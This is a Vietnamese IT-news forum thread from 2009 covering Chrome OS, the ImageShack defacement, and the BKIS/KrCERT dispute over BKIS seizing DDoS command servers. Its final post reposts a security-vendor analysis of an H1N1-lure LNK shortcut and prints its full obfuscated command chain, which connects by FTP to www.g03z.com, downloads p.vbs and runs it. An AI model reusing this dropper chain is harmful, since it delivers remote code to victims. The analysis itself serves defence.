[IT NEWS] Nơi cập nhật vào thảo luận những tin tức về IT

Ừm, netbook có giới hạn của nó, không thể đem so sánh được.
Không có ý gì, chẳng qua mình muốn nói windows là môi trường đa phương tiện.

anh gù quyết định bắt đầu từ netbook chứ ko phải là ko có ý định xâm nhập vào thị phần to lớn hơn. Có lẽ ko muốn đi theo vết xe của linux. Anh gù quyết định chú trọng vào netbook, nơi mà windows ko thực sự phù hợp với sự cồng kềnh + chậm chạp. Và khi mọi người sử dụng netbook ko còn xa lạ với OS chrome thì cũng có nghĩa là người dùng đã chấp nhận và làm quen được với OS mới. Khi đó anh ấy sẽ nhẩy vào thị trường mà Windows đang lắm giữ.

Linux thực tế cũng rất là tuyệt vời nhưng nó ko thành công như windows bởi vì nó quá xa lạ. Hầu hết mọi người dùng (cơ bản) đều cho rằng linux khó sử dụng nhưng đó là do họ đã dùng windows trước đó. Hãy thử tượng tượng hdh đầu tiên ta sử dụng lại là linux thì lúc đó windows sẽ trở thành xa lạ.

Cái thành công của Windows là nó chính là người đi tiên phong. Nhưng chẳng có gì để chúng ta ko chờ đợi 1 cái mới mẻ thay thế cho cái cũ đó cả [-X.

Trên đây chỉ là suy nghĩ cá nhân em. Các bác cứ quăng tạ thoải mái :P
 
Theo mình Google sẽ không nhảy vào thị trường thế mạnh của Windows (desktop với các ứng dụng offline) Thay vào đó Google sẽ phát triển Chrome thành một platform (hoạt động trên cả Windows, Linux, Mac) để host các ứng dụng nền web, giúp chúng có thể chạy trong trạng thái offline, tích hợp tối đa web với desktop (chẳng hạn search sẽ được thực hiện trên cả web và dữ liệu cá nhân offline, click đúp chuột lên file Word thì nó sẽ mở bằng Google Docs...)

Mình không hiểu vết xe của Linux là vết xe nào? Và Windows thì đi tiên phong trong cái gì?
 
ImageShack Hacked by Anti-sec Movement !!!

ImageShack (ImageShack), one of the web’s largest image hosts, was attacked tonight by a movement called “Anti-Sec”. The result of the attack has been to replace all ImageShack hosted images with a manifesto for the movement (below).

The message adds that “no images were harmed in the making of this…image”, implying that ImageShack images are not lost.

We’ll post updates as we learn more: please add your own experiences in the comments

imageshackhack.gif



Mã:
http://mashable.com/2009/07/10/imageshack-hacked/

confirmed !
 
trời, bao nhiêu ảnh up lên đây hết, thế là toi rồi.
 
hic, đang xài cái này leech dở trò Bike 3, vậy là cuối tuần nay ko có trò giải trí rồi.
edit: vào lại bình thường rồi mà :?
 
trời, bao nhiêu ảnh up lên đây hết, thế là toi rồi.
implying that ImageShack images are not lost

hic, đang xài cái này leech dở trò Bike 3, vậy là cuối tuần nay ko có trò giải trí rồi.
edit: vào lại bình thường rồi mà :?

vào được, nhưng link ảnh bị thay đổi. mà cái torrent service thì vẫn hoạt động bt
 
[VIDEO]VUawhjxLS2I[/VIDEO]

Quảng cáo Office 2010 của MS. Quả là khó đỡ. Rất hài hước.
 
Hàn quốc kiện vì KrCERT không có yêu cầu nhờ và như BKIS đã công bố

Originally Posted by vikhoa View Post
Hôm nay, có 1 số báo nhận được công văn của VNCERT gửi cho trường ĐHBKHN. Tôi cũng được đọc công văn này nên xin trích ra 1 đoạn cho các bạn tham khảo:
Trong thời gian vừa qua Trung tâm An ninh mạng ĐHBK Hà Nội (BKIS) đã tiến hành công bố rộng rãi trong và ngoài nước về việc BKIS phát hiện nguồn gốc vụ tấn công website Mỹ, Hàn (http://blog.bkis.com/?p=718).

Vào ngày 15/07/2009 Trung tâm Ứng cứu khẩn cấp máy tính Việt Nam (VNCERT) nhận được khiếu nại của ông J.Cho thuộc Trung tâm điều phối ứng cứu khẩn cấp máy tính Hàn Quốc (KrCERT/CC) gửi đến Trung tâm BKIS (có đồng gửi cho VNCERT).

Vào ngày 16/07/2009 Trung tâm VNCERT tiếp tục nhận được khiếu nại của ông J.Cho gửi đến Hiệp hội các tổ chức ứng cứu máy tính Châu Á-Thái Bình Dương (APCERT) và thư khiếu nại yêu cầu đính chính thông tin chính thức của KrCERT/CC gửi đến Trung tâm BKIS (có đồng gửi cho VNCERT).
Quote:
Trong tất cả các thư khiếu nại trên đề cập đến các vấn đề sau:

- KrCERT không có yêu cầu chính thức nào đề nghị BKIS hỗ trợ điều tra thủ phạm như các thông tin mà BKIS công bố. KrCERT đã tự tiến hành các hoạt động nghiên cứu của mình và chỉ cung cấp mã độc cho BKIS tham khảo sau khi BKIS đã nhiều lần gọi điện để xin (nguyên văn: BKIS begged the DDoS malware ...).

- Việc BKIS thừa nhận tấn công và chiếm quyền điều khiển 02 server để tiến hành phân tích là vi phạm nghiêm trọng luật pháp Việt Nam và quốc tế. Cách BKIS công bố thông tin khiến công chúng hiểu rằng BKIS thực hiện các hành vi tấn công trái pháp luật và đồng thời gây nhầm lẫn là KrCERT và APCERT cũng tham gia vào các hành vi phạm pháp này.

- KrCERT đề nghị BKIS đưa ra giải thích và đính chính các thông tin đã công bố trên các phương tiện truyền thông trong thời gian sớm nhất trước khi kiện BKIS theo luật pháp quốc tế.

Trên thực tế KrCERT chỉ gửi yêu cầu trực tiếp đến VNCERT (có đồng gửi cho BKIS do là thành viên của APCERT) để yêu cầu hỗ trợ tháo gỡ mã độc tại một số địa chỉ IP của Việt Nam đang tham gia đợt tấn công. Trung tâm VNCERT với trách nhiệm là trung tâm điều phối cấp quốc gia đang thực hiện điều phối các ISP tại Việt Nam để xử lý yêu cầu của KrCERT trong khuôn khổ hợp tác của tổ chức APCERT.
Quote:
Trung tâm VNCERT là đầu mối của Việt Nam thực hiện các hoạt động hợp tác quốc tế về ứng cứu sự cố máy tính. Khi tham gia các hoạt động hợp tác quốc tế trong lĩnh vực này BKIS cần báo cáo các nội dung với Trung tâm VNCERT. Nếu tự ý tham gia thì Trung tâm BKIS phải tự chịu trách nhiệm về các hậu quả gây ra do các hoạt động của mình.
Quote:
Việc BKIS tham gia phân tích và tìm nguồn tấn công là rất đáng quý và cần khuyến khích, tuy nhiên theo quy định của Nghị định 64/2007/NĐ_CP BKIS cần cung cấp thông tin cảnh báo và sự cố về cho trung tâm điều phối quốc gia-VNCERT đồng thời giữ bí mật và chỉ cung cấp thông tin cho các bên liên quan theo đúng tinh thần mà các tổ chức ứng cứu máy tính trên thế giới tôn trọng.
Quote:
Việc tham gia xử lý sự cố quốc tế rất nhạy cảm và nguy hiểm, thậm chí tội phạm mạng có thể chuyển hướng tấn công vào Việt Nam để trả đũa nên Việt Nam phải tham gia phối hợp quốc tế theo những nguyên tắc tổ chức đã được cân nhắc và giữ bí mật nghiêm ngặt. BKIS không nên vì mục đích quảng bá thương hiệu mà công bố thông tin rộng rãi và không chính xác dẫn đến gây nguy hiểm cho các hệ thống thông tin trong nước và khiếu kiện quốc tế.
Quote:
Sự cố này là một vấn đề có thể ảnh hưởng đến quan hệ quốc tế giữa Việt Nam và Hàn Quốc, cũng như gây ảnh hưởng đến uy tín của cộng đồng doanh nghiệp CNTT của Việt Nam. Phía KrCERT/CC đã yêu cầu BKIS phải trả lời chính thức từ ngày 15/07/2009 nhưng cho đến 16 giờ ngày 16/07/2009 vẫn chưa có phản hồi.
Trên website của BKIS có câu:

Quote:
Được gửi bởi BKIS
Bkis, as a member of APCERT, received a request from KrCERT (Korean Computer Emergency Response Team) to investigate the incident that was performing DDoS attacks on websites of South Korea and the US.
Thực ra KrCERT chỉ yêu cầu gỡ bỏ mã độc hại và điều tra lây nhiễm tại 1 số dải IP của VN, và gửi cho VNCERT và BKIS. Hơn nữa, theo nguyên tắc làm việc của CERT thì "BKIS cần cung cấp thông tin cảnh báo và sự cố về cho trung tâm điều phối quốc gia-VNCERT đồng thời giữ bí mật và chỉ cung cấp thông tin cho các bên liên quan theo đúng tinh thần mà các tổ chức ứng cứu máy tính trên thế giới tôn trọng".

Như vậy, rõ ràng là phía BKIS đã "cố tình hiểu lầm" yêu cầu điều tra của KrCERT và chỉ vì mục đích muốn PR cho mình mà BKIS đã tự công bố kết quả ra public, bất chấp nỗ lực của các nước đang điều tra (US & Kr), làm "bứt dây động rừng", ảnh hưởng nghiêm trọng đến việc điều tra của các nước. Chưa kể đến việc hack vào 2 servers là vi phạm luật pháp Việt Nam và luật pháp quốc tế.

Quote:
Được gửi bởi BKIS
In order to locate the source of the attacks, we have fought against C&C servers and have gained control of 2 in 8 of them.
Trong thời gian vừa rồi, các báo VN và cả VTV cũng có đưa tin về BKIS như 1 "hero". Chẳng lẽ không báo chí nào nhìn thấy việc hack vào 2 servers của BKIS là vi phạm luật pháp nghiêm trọng mà còn "tung hô" lên như thế?!?!

Nguồn (ddth.com): http://www.ddth.com/showthread.php?t=289633
 
chết mày chưa , cho mày chừa b-(
 
haha
ôi BKIS
ôi mr Quảng =))
 
Kiểu này BKis ko xong rồi.
VN mà bị hacker tấn công thì :-s
 
lão kylin vừa gửi xong... đọc đến buồn cười, lol =))
 
BKIS không nên vì mục đích quảng bá thương hiệu mà công bố thông tin rộng rãi và không chính xác dẫn đến gây nguy hiểm cho các hệ thống thông tin trong nước và khiếu kiện quốc tế.
Định nói ý kiến của mình, nhưng dòng này đã nói lên tất cả.
Anh Quảng, làm ơn trưởng thành xíu đi, không hay ho gì đâu.

Hic không chừng có vệ quân của anh Quảng trong này, trả đũa mình thì chết !
 
bởi vậy hồi đầu mình đã nghi nghi rồi , mấy anh này tài năng ko có mà tài lanh có thừa, đâu ra chỉ cái server chủ bên nước Anh =) làm cho đã rồi giờ bị kiện ngược lại nửa =) cầu nguyện cho các anh ấy thôi
 
- Việc BKIS thừa nhận tấn công và chiếm quyền điều khiển 02 server để tiến hành phân tích là vi phạm nghiêm trọng luật pháp Việt Nam và quốc tế.

Mặc dù phải nói là việc làm lần này là hơi ngu nhưng Việt Nam giỏi thật =))
 
Mã:
http://blog.avast.com/2009/07/20/avast-5-is-coming-soon/

Nhìn URL là hiểu :hug:
 
BKIS: “Chúng tôi chẳng làm gì sai!”

Ông Nguyễn Tử Quảng, giám đốc BKIS cho rằng thông tin về việc “KrCERT không có yêu cầu chính thức nào đề nghị BKIS hỗ trợ điều tra thủ phạm...” là không chính xác. Trong email KrCERT/CC gửi ngày 10/7, cơ quan này đã khẩn thiết đề nghị các thành viên của Tổ chức Cứu hộ Sự cố máy tính khu vực Châu Á - TBD (APCERT) trợ giúp với nội dung trích dẫn sau:

“Nếu như bất cứ ai có thể giúp chúng tôi làm dịu tình hình này càng sớm càng tốt, chúng tôi hoan nghênh mọi nguồn tin về nguồn gốc của cuộc tấn công này, báo cáo phân tích về malware hay bất cứ tài liệu nào liên quan đến vấn đề này. Chúng tôi sẽ đánh giá cao nếu nhận được những tài liệu đó. Chúng tôi đang tuyệt vọng và chịu ảnh hưởng phá hoại nặng nề của cuộc tấn công... Chúng tôi thực sự mong muốn khắc phục tình trạng này. Cảm ơn vì các bạn đã quan tâm”. Do đó, thông tin nói rằng KrCERT/CC không đề nghị BKIS hỗ trợ điều tra là không chính xác.

Trong công văn 143/VNCERT còn nêu “BKIS thừa nhận tấn công và chiếm quyền điều khiển 2 server để tiến hành phân tích là vi phạm nghiêm trọng luật pháp Việt Nam và quốc tế...”. Trả lời về điều này, ông Quảng cho biết thực chất đây có lẽ là nội dung được dựa trên email của ông Jinhyun Cho. Tuy nhiên trong email đó, ông Jinhyun Cho cũng không khẳng định những điều này mà ông ta phỏng đoán là như vậy.

Đại diện BKIS cho rằng thực tế ông Jinhyun Cho không hề biết phương pháp BKIS đã thực hiện nhằm khống chế 2 server nói trên. Do đó, phát biểu của chuyên gia Hàn Quốc này hoàn toàn võ đoán và không có căn cứ và BKIS "sẽ làm việc với KrCERT/CC về việc này".

“Tấn công ngược”, “chiếm quyền điều khiển” hay “khống chế”?

Về kỹ thuật "tấn công ngược" 2 server của BKIS, ông Vũ Ngọc Sơn, Giám đốc Nghiên cứu và Phát triển (BKIS R&D), cho biết tại thời điểm phân tích, các server của hacker vẫn đang tiếp tục truyền các mã độc xuống hệ thống máy tính botnet. Trung tâm này đã khảo sát cả 8 server điều hành tấn công, phát hiện được được 02 server cung cấp các dịch vụ chia sẻ tài nguyên theo một kiểu dịch vụ web.

"Đây là một dạng dịch vụ hoàn toàn thông thường, ai cũng có thể sử dụng", ông Sơn khẳng định. "Thông qua đó các chuyên gia BKIS có được các thông tin giúp ích cho việc phân tích và chỉ ra được server thứ 9, chính là master server (server gốc), nơi tổng chỉ huy các cuộc tấn công vào website chính phủ Hàn Quốc và Mỹ. Do đó, tất cả các công việc này đều tuân theo các quy trình, quy định của luật pháp Việt Nam và Quốc tế".

Trong một trả lời khác với báo chí về việc "khống chế" hai server bị hacker sử dụng vào mục đích tấn công, ông Nguyễn Tử Quảng cũng khẳng định hành động này "hoàn toàn không phải xin phép và bất kỳ ai cũng có thể thực hiện."

Tuy nhiên, trên blog bằng tiếng Anh của BKIS lại mô tả rất rõ về quá trình khống chế 2 server nước ngoài: "Để xác định nguồn gốc các cuộc tấn công (từ chối dịch vụ DDOS - PV), chúng tôi đã tấn công trở lại các máy chủ C&C và giành được quyền điều khiển 2 trong số 8 máy chủ này. Sau khi phân tích các file log (dữ liệu giám sát các hoạt động của hệ thống - PV) của 2 máy chủ này, chúng tôi đã phát hiện được địa chỉ IP của master server là 195.90.118.xxx và được đặt tại Anh, sử dụng hệ điều hành Windows Server 2003".


Phần mô tả bằng tiếng Anh trên blog của BKIS về quá trình tấn công ngược, giành quyền kiểm soát và phân tích file log hệ thống của 2 máy chủ bị hacker sử dụng vào cuộc tấn công DDoS.

Về việc VNCERT cho rằng "BKIS cần cung cấp thông tin cảnh báo sự cố về cho trung tâm điều phối quốc gia - VNCERT đồng thời giữ bí mật và chỉ cung cấp thông tin cho các bên liên quan theo đúng tinh thần mà các tổ chức ứng cứu máy tính trên thế giới tôn trọng", Tổng Giám đốc BKIS Nguyễn Tử Quảng đã dẫn khoản 4 điều 43 của Nghị định 64/2007/NĐ-CP của Chính phủ: “Trong trường hợp khẩn cấp có thể gây sự cố nghiêm trọng hay khủng bố mạng, các cơ quan chức năng có quyền tổ chức ngăn chặn các nguồn tấn công trước khi có thông báo, sau đó lập biên bản báo cáo cho cơ quan điều phối”.

"Do sự kiện website Chính phủ Hàn Quốc và Mỹ bị tấn công tê liệt đã diễn ra gần 10 ngày mà chưa tìm ra nguồn phát động tấn công, đây là một tình huống khẩn cấp có nguy cơ ảnh hưởng đến toàn cầu trong đó có Việt Nam, BKIS bắt buộc và được phép thực hiện truy tìm nguồn phát động tấn công, rồi sau đó báo cáo cơ quan điều phối. Hiện tại chúng tôi vẫn khẩn trương tiếp tục tiến hành điều tra cho nên chưa có thời gian để báo cáo. Chúng tôi sẽ thực hiện điều này sau khi đã hoàn thành công việc", ông Quảng nói.

Nhưng rõ ràng Nghị định 64/2007/NĐ-CP của Chính phủ về Ứng dụng CNTT trong hoạt động của cơ quan nhà nước của Việt Nam chắc chắn sẽ không thể áp dụng trong trường hợp các hệ thống mạng máy tính của Hàn Quốc hay Mỹ bị tấn công. Tuy nhiên, việc BKIS tự ý chiếm quyền điều khiển và phân tích các log file trên 2 máy chủ nằm ở nước ngoài sẽ vẫn nằm trong phạm vi áp dụng của các quy định về luật pháp quốc tế và của nước sở tại đang đặt 2 máy chủ này. Có lẽ chính vì điều đó, phía KrCERT không muốn liên đới tới hành động chiếm quyền kiểm soát máy chủ đặt tại nước ngoài của BKIS.
Anh quảng nguỵ biện cho hành động của mình, chẳng ra sao cả!
Nguồn
 
làm ơn mắc oán=))
Ngu thì chết thôi anh Quảng ạ
thích đem tính sĩ diện của người VN ra nước ngoài cơ >:)>:)
 
H1N1 Shortcut Malware

We ran into another new piece of malware using the "H1N1" swine flu as lure.

This one is a shortcut file. And it's not a Windows EXE executable that has been renamed to .LNK, it is an actual link file.

Here's what the file looks like (md5: d17e956522f83995654666c0f2343797).


h1_link_1.png



Looking at the file from command prompt, it looks like a harmless shortcut, 1987 bytes in size.

h1_link_2.png


But when you view the contents, you see something suspicious:

h1_link_3.png


Let's have a look at the properties of the shortcut:

h1_link_4.png


It's linking to %ComSpec%? Doesn't sound too good. Let's copy and paste where this shortcut is linking to:

h1_link_6.png


That doesn't make much sense.

Let's try break that into smaller pieces to see what it's doing:

Mã:
%ComSpec% /c                         // Executes command prompt to run the next commands
     set h=p -                            // sets variable "h" as "p –"
     set j=ge                             // Sets variable "j" as "ge"
     set s=.g03z.                         // sets variable "s" as ".g03z."
     echo echo o www%s%com^>t>b.bat       // writes "echo o www%s%com>t" to b.bat - that's "www.g03z.com"
     call b.bat                           // calls the newly created b.bat
     echo aa33>>t                         // writes "aa33" to file called t
     echo bb33>>t                         // writes "bb33" to file called t
     echo echo %j%t p p.vbs^>^>t>>c       // writes "echo %j%t p p.vbs>>t" to file called c - that's "get"
     echo echo bye^>^>t>>c                // writes "echo bye>>t" to file called c
     echo ft%h%s:t>>c                     // writes "ft%h%s:t" to file called c - that's "ftp"
     echo start p.vbs>>c                  // writes "start p.vbs" to file called c
     ren c h.bat                          // renames c to h.bat
     call h.bat                           // calls h.bat

As an end result, clicking on this shortcut will cause your machine to do the following things:


* Connect to an ftp site called www.g03z.com
* Log in with username aa33 and password bb33
* Download a script called p.vbs
* Run the script

So who owns g03z.com? Well, it's Mr. Zzzzggg: (iamgod: LOL)

h1_link_5.png


The domain is still up, but the file p.vbs is currently missing from the server, so right now nothing happens.

We detect and block this malicious shortcut.



// cái này hay à nha :-?

source:
Mã:
http://www.f-secure.com/weblog/
 
Back
Top